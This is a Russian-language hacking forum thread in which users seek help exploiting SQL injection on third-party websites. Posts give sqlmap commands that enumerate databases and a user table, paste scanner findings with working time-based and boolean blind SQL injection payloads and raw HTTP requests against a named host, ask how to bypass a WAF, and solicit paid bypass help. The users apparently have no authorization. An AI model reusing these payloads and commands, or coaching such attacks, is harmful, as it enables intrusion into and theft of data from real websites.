HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1021  
Старый 02.04.2020, 16:12
mixer123
Новичок
Регистрация: 19.09.2011
Сообщений: 12
Провел на форуме:
3970

Репутация: 0
По умолчанию

Доброго времени всем. При таком запросе:

sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive

Получаю название бд. Дальше при такой команде:

sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables

Получаю следующее:

.SpoilerTarget" type="button">Spoiler: Скриншот


Пробовал напрямую делать запрос:

sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

Такая же ошибка



Я так понимаю дело в этом?



Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?

Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

P.s

Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.

Есть предложение на взаимовыгодных условиях.
 
Ответить с цитированием

  #1022  
Старый 02.04.2020, 18:49
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
Провел на форуме:
61136

Репутация: 32
По умолчанию

Цитата:
Сообщение от hashfinderboss  

я знаю что есть ерор,унион,болеан,таймбасе ,стэйкед,инлине а как выглядит UPDATE?
UPDATE, это оператор который обновляет столбцы в базе данных.

mysql.ru/docs/man/UPDATE.html

Цитата:
Сообщение от hashfinderboss  

как проверить UPDATE или нет?
Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
 
Ответить с цитированием

  #1023  
Старый 02.04.2020, 20:56
mixer123
Новичок
Регистрация: 19.09.2011
Сообщений: 12
Провел на форуме:
3970

Репутация: 0
По умолчанию

Застрял на этом моменте:



Подскажите, что делать дальше?
 
Ответить с цитированием

  #1024  
Старый 05.04.2020, 23:07
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от mixer123  

Застрял на этом моменте:

Подскажите, что делать дальше?
Искать тамперы
 
Ответить с цитированием

  #1025  
Старый 22.04.2020, 23:29
rozzet
Новичок
Регистрация: 29.10.2017
Сообщений: 6
Провел на форуме:
1085

Репутация: 0
По умолчанию

Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться

например это?

The vulnerability affects https://site.com/product/11/HP-4250N...inter-LIKE-NEW , X-Forwarded-For

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Tests performed:

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489

0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852

0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218

Original value: 3iv1i

HTTP Request

arrow_drop_up

GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1

Referer: https://www.google.com/search?hl=en&q=testing

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0

X-Requested-With: XMLHttpRequest

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: copyfaxes.com

Connection: Keep-alive
 
Ответить с цитированием

  #1026  
Старый 22.04.2020, 23:30
rozzet
Новичок
Регистрация: 29.10.2017
Сообщений: 6
Провел на форуме:
1085

Репутация: 0
По умолчанию

Цитата:
Сообщение от rozzet  

Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects
https://site.com/product/11/HP-4250N...inter-LIKE-NEW
, X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive
и это например?буду предельно благодарен за помощь.

The vulnerability affects https://www.site.com/ , /--[*]-.html

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

Path Fragment input /--[*]-.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

Tests performed:

volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*3 FALSE

volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*3*9 FALSE

volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 5*6 FALSE

volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE

Original value: volts-amplifier-and-cd-players

HTTP Request

arrow_drop_up

GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUN L-1517.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive
 
Ответить с цитированием

  #1027  
Старый 27.04.2020, 00:13
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме:
6200

Репутация: 0
По умолчанию

Всем привет. Acunetix выдал такое:

Код:
Уязвимость затрагивает https://www.site.com/ , /  /  /[*] /  /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути /  /  /[*] /  / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
 
Ответить с цитированием

  #1028  
Старый 27.04.2020, 01:34
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от vladF  

Всем привет. Acunetix выдал такое:
Код:
Уязвимость затрагивает https://www.site.com/ , /  /  /[*] /  /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути /  /  /[*] /  / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
Точно так же как написали выше, со слепыми может быть ложное срабатывание
 
Ответить с цитированием

  #1029  
Старый 27.04.2020, 02:07
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме:
6200

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  

Точно так же как написали выше, со слепыми может быть ложное срабатывание
Двумя сканерами проверил,не должна быть ложная
 
Ответить с цитированием

  #1030  
Старый 30.04.2020, 11:48
kasper2020
Новичок
Регистрация: 30.04.2020
Сообщений: 3
Провел на форуме:
1154

Репутация: 0
По умолчанию

Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?

Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.

back-end DBMS: MySQL >= 5.0.0

banner: '5.7.26-log'

server: Apache/2.2.15 (CentOS)

x-powered-by: PHP/5.3.3
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.